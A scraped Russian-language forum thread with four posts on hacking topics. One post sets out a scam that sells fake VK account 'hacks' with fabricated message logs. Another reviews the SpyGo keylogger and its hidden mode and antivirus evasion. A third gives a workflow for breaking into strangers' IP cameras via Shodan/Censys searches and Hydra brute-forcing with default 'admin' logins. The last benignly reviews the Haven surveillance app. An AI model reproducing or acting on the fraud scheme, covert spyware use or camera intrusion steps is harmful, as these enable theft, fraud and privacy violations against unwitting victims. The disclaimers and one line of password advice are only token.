  18. Всем привет, последнее время очень часто затрагивается тема различных взломов. Особенно часто затрагивается тема взломов страничек вк. Именно из-за этого я решил вам рассказать способ заработка на “взломах” аккаунтов. Немаловажный фактором является то, что схема приводится в действие практически без каких-либо затрат. Для этого нам будет необходима менее мягкая аудитория, для этого идеально справится телеграм аккаунт, несколько красивый скринов со взломами страничек и конечно же отзывами от счастливый клиентов и барабанная дробь…. Приложение в Плей Маркет под названием “взлом вк”. Нет, вам не показалось. Именно с помощью данного приложения мы и будем совершать великие кражи данных невинных жертв. На самом деле, я думаю вы уже догадались, что мы будет разводить доверчивых жертв, который насмотревшись на темную сторону телеграма, где обитают все самые лучшие хакеры, которые способы взломать сервера НАСА. К таким мастерам и начнут обращаться, чтобы взломать своего знакомого и раскрыть всего сокровенные секреты. 1.Первым делом нам нужно найти жертву, которая напишет нам в личные сообщения после рекламы, группы или обычного объявлении, в распространении вы ограничены только своей фантазии. После того как он клюнул, вы ждете 5 минут ничего не отвечаем, после чего скопировав специальный прайс-лист кидаем его ему. Конечно же, основным условием должна быть открытая страница и айди должен точно пропечатываться на главной странице. 2. На счастливая жертва, которая чуть ли не падает в обморок, из-за того, что он смог найти хакера за 500 рублей, а после чего точно падает без сознания понимая, что даже не нужно вносить никакой предоплаты и перевод денег будет осуществляться только после самого взлома и показания доказательств. Теперь жертва ни капельки не сомневается в вашем профессионализме и теперь ожидает, что вы точно сможете взломать какого-то челика. Отлично, пишем ему о том, что вы приняли заказ и то, что он будет исполнен в течении суток. Срок выполнения нужно выбирать правильно, ведь если он будет слишком большой, то желание работать с вами уменьшится, а если будет слишком маленьким, то жертва может сорваться. 3. Наконец-таки скачиваем с магазина Андроид приложение “Взлом вк”, после чего, как вы, наверное, догадались, нам нужно его открыть. 4. Мы увидим поле, где нам нужно будет написать айди того человека, которого собираемся “взломать” 5. После этого мы якобы зайдем на его страницу и в сообщениях будут рандомные переписки данного человека. Если список не нравится, то можете заново повторить эти действия и получить другие сообщения. 6. Основное дело сделано, нам осталось только отчитаться о выполнении задания и получить свой гонорар, оставив жертву у разбитого корыта. Информация предоставлена исключительно для ознакомления и не призывает к действиям. Автор не несет ответственности за использование вами данной информации в личных целях.
  19. Сегодня мы рассмотрим кейлогер созданные для Windows любых версий – SpyGo. Этот кейлогер не использует агрессивное поведение, а это значит, что найти его не сложно, но он является законным. Сами авторы идут не по пути хакерских программ, созданных для шпионажа, а как средство, которое позволяет вести легальный мониторинг. Авторы всеми способами пытаются добиться того, что их творение не попала в БД антивирусов. Несмотря на то, что это ПО находится под шифром, но при себе имеет цифровую подпись. Поэтому на установщик этой программы не ругает ни один из антивирусов, а если быть точнее, лишь пару и то, только как подозрительное ПО. Этот кейлогер существует в трех различных версиях. Последнее обновление выходило в этом году. Принципиальное отличие версий заключается в том, что они имеют различные продвинутые опции. Например, в Ultima Edition мы можете включить прослушку через встроенный микрофон, а также узнать, где находится система с этой программой. Также данная продвинутая версия имеет в отличии от предыдущих дистанционные опции. Среди функций данной программы, можно отметить запоминание нажатий на клавиатуру а также вынимание информации из буфера обмена. Также данное ПО записывает информацию о системе, то есть когда была включена или выключена система или открытие каких-то приложений. Особенно хорошо справляется этот кейлогер с извлечением информации из браузера. Он способен узнавать все ваши посещения сайтов и запросы в поисковых системах. Также одной интересной функцией является то, что вы можете делать скриншоты, даже в играх и фильмах, а также получать информацию с веб-камеры. Главные пользователи этой программы чаще всего используют функции мониторинга информации в социальных сетях и прочих сервисах. Данная утилита способа дать вам всю эту информацию, просто записав это в отдельные логи. Также SpyGo является полезной программой по той причине, что запускать его можно в необходимое вам время и записывать лишь ту информацию, что вам нужно в тот или иной момент. Все полученные данные находятся под шифром. Это значит, что получить вы их сможете только с помощью этой программы. Все логи группируются по определенным фильтрам. Поэтому вы сможете примерно знать, как работает тот или иной пользователь, однако расхождения тоже бывают. Программа после установки сразу дает о себе знать. Во время этого действия на компьютер пользователя даже устанавливается ярлык открытия приложения, а в опциях пользователь сможет включать или отключать функцию уведомления о слежки. Если пользователь ее отключит, то после перезапуска будет выводится предупреждение. Это было задумано для того, чтобы к разработчикам не было претензий о том, что идет распространения софта для незаконной слежки. Однако включить некий скрытый режим можно вручную, после того как будет совершен первый запуск программы. В этом режиме окно программы не будет показаться, в трее не будет показываться значок, а также будут прочие сокрытия работы этой утилиты. Чтобы обратно открыть окно программы, вам нужно будет нажать специально выбранную комбинацию клавиш. Если же вы не помните эту комбинацию, то можете запустить установку еще раз, где вам будет сказано о том, что есть копия и она поможет вам открыть окно. Программа будет скрыта не только с рабочего стола и диспетчера задач, но и более продвинутых утилит для просмотра процессов. Практически все антивирусы не имеют реакции на этот кейлогер. Однако вот с диска эта программа далеко не убегает. Единственное, что содержащая его папка получает статус “скрытый” поэтому если вы имеете стандартные права, то вы его не увидите. Однако любыми другими файловыми менеджарами его будет легко найти по директории. Конечно, можно установить и в другое место, но это не дает особо результата, так как сам exe файл никогда не меняется, ведь если бы это было так, то он блокировался бы антивирусами как полиморфный вирус. В автозапуск системы добавится лишь RTDLib32.dll. Никаких жалоб со стороны антивирусов на него не будет, однако этот процесс очень легко обнаружить. Безусловно, есть большое количество кейлогеров. Однако практически все они будут основываться либо на The Rat, либо на описанном мною SpyGo.
  20. Сейчас я вам расскажу о том, как можно получить доступ к чужим камерам и соответственно защитится от этого. Камер для наблюдения в наше время огромное количество и используются они в совершенно различных сферах. Мы будем использовать обычную базу, с помощью который мы сможем находить эти камеры и производить к ним подбор паролей. Теория Чаще всего, после установки камеры никто не меняет ее данные для доступа. Поэтому нашей целью будет сканирование самых распространенных портов, а именно: 8000, 8080, 554. Поэтому при сканировании сетей, рекомендую сразу же выбирать данные порты. Первый способ К примеру, вы можете найти запросы в таких поисковиках, как Shodan и Censys, используя данные порты. Благодаря этому методу, вы без каких-либо проблем получите доступ к огромному кол-ву камер, на которых отсутствует пароль. Многие их находятся в неплохих местах, таких как: магазины, офисы, кафе и прочее. Таким образом вы получить доступ ко многим интересным местам. Помните, что вы также можете добавить к поиску фильтр country, который позволит получать доступ к камерам определенной страны. Второй способ Для взлома камер также можно использовать поиск стандартных соц. сетей. Рекомендую для этого выбирать заголовки страниц, когда вы смотрите изображения с видеокамер. Третий способ Этот метод является целевым. Его нужно использовать если у вас есть определенная точка и вам нужно подобрать к ней пароль или если вы хотите прогнать базу по основным паролям и найти действующие. Чтобы выполнить все эти процедуры, можно использовать программу Hydra. Но для ее работы, вам будет необходим словарь. Можно пройтись в поисках обычных паролей для сетей. Давайте я вам покажу это на данном примере. Вы выберем камеру с моделью DCS-2103. Эта модель очень часто устанавливается. Ее рабочий порт это – 80. Теперь нам нужно использовать все эти данные для поиска информации в Shodan. После того как информация будет найдена, мы копируем все айпи, который могли вас заинтересовать. После чего создаем список. Делаем словарь паролей, чтобы все это использовать в программе Hydra. Для начала вам нужно будет добавить в папку базу. В папке с программой мы должны разместить только текстовый файл с паролями, так как логин у нас будет везде одинаковый – admin, который будет иметь параметр -1, если же будет необходимость сделать базу с логинами, то для этого вам нужно будет добавить еще 1 файл в папку с программой и приписать ему параметр –L. Все валидные результаты можно найти в текстовом файле – good. Список ИП будет необходимо прописать в директорию программы с текстовым файлом targets. http-get, которая является конечной строкой в команде, необходима для соединения с помощью порта 80. Так же хотелось бы сказать несколько слов о сканировании, Если вы хотите получить номера сетей, то нужно будет воспользоваться определенными сервисами. После чего сетки вы проверите на то, имеются ли в них нужные порты. Никаких сервисов я вам не подскажу, но лучше пользоваться чем-то похожим, как masscan или vnc scanner. Можно использовать и довольно популярную программу - nmap. Все это идет только на ваше усмотрение. Ведь главной целью является – сканирование и последующее нахождение ИП с нужными вам портами. Заключение Не забывайте, что благодаря камере вы сможете не только просматривать что-либо, но еще это фотографировать и записывать сохраняя себе. Также некоторыми моделями можно управлять, а именно поворачивать их. А самое забавное – это то, что вы можете воспроизводить звуки. Какие тут нужны еще советы? Устанавливайте сложный пароль и перебрасывайте порты.
  21. Наверняка у любого из вас есть по крайней мере один забытый телефон с Андроид. А если он вам уже не нужен, то с ним можно сделать кое-что интересное, а именно сделать из него прибор для наблюдения, с возможностью записывать аудио, вести скрытую сьемку и даже реагировать на движения. Система наблюдения из старого телефона Наверное вы сами себе сказали: “Пф.. Америку открыл. Этого более чем достаточно в Play Market”. Да, вы безусловно правы, но лишь частично. Я же расскажу про приложение Haven, которое не только сделает из вашего телефона скрытую камеру, но и может похвастаться этим: Эдвард Сноуден – гуру анонимности рекомендовал это приложение.Информация не хранится на посторонних серверах.Программа с открытым кодом, которую может скачать любой желающий.Помните, что скрытая запись видео- и аудиозаписей запрещена законодательством Российской Федерации! Приложение Haven Прямо сейчас используется большое количество устройств для обеспечения защиты в доме. Но факт того, что ваше имущество находится под контролем системы безопасности, дает повод беспокоится о конфиденциальности ваших данных. А всего из-за того, что данные гаджеты ведут запись звука или съемку видео, которое может попасть в руки злоумышленников. Поэтому если вы не желаете, чтобы ваша личная информация использовалась третьими лицами, то вам нужно быть уверенными, что соблюдены правила конфиденциальности. Haven – приложение с открытым кодом, а значит оно полностью бесплатно. Устанавливается на системы с операционной системой Андроид, превращая ваше устройство в систему наблюдения, где сохраняется конфиденциальность. Данная программа была хорошо оценена Эдвардом Сноуденом и его компанией. Haven запустится на любых устройства с поддержкой данной ОС, даже на древнем гаджете. Программа использует не только камеру или микрофон для записи видео или аудио, но и даже акселерометр, которой позволит отслеживать движения. Применить Haven можно в различных сферах. Например, оставив ценные вещи в сейфе отеля, а рядом установив ваш телефон можно включить запись звука и движения. Если вдруг кто-то откроет сейф, то программа автоматически сфотографирует вора, после чего на ваш смартфон придет уведомление. Уведомления отправляется через SMS, Singal и даже Tor. Основной целью данного приложения – это превращение любых устройств с установленным Андроид в систему наблюдения и использование датчиков гаджета для выполнения поставленных задач. Программа начинает запись видео или аудио только тогда, когда начинаются движения или появление звуков и все это хранится непосредственно на вашем устройства, но никак не в облачных сервисах, как это бывает с другими подобными программами. На данной момент использует эти датчики: Акселерометр: реагирует на движения или вибрациюКамера: движение в зоне действия камерыМикрофон: звукиСвет: изменение уровня света Настройка Haven После того как вы установите и запустите приложение, вас попросят установить порог датчиков для записи звука и отслеживания движения, далее вы пройдете тестирование, чтобы программа не начала ложно записывать информацию. После того, как вы правильно настроите Haven, вы сможете убрать шумы от бытовой техники или появления вашего домашнего питомца. Кроме этого, программа предложить вам выбрать место, куда будут отправляться уведомления. Это необязательный пункт, однако в этом случае, вся записанная информация будет находится непосредственно на данном устройстве. Программа шифрует данные, чтобы вся информация была защищена. Если вы хотите получить еще больше конфиденциальности, то для этого у вас есть возможность подключить сеть Tor. Стоит ли использовать Haven? Эта программа концентрируется на том, чтобы дать пользователю наибольшую конфиденциальность данных. За это авторам можно смело ставить плюс. Однако и без недостатков не обошлось. Сама программа очень слабо защищена, поэтому если ваше записывающее устройство попадет в руки третьих лиц, то это может иметь плохие последствия. Будем надеется, что данную недоработку исправят в ближайшее время, все-таки приложение находится на стадии бета-тестирования.
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.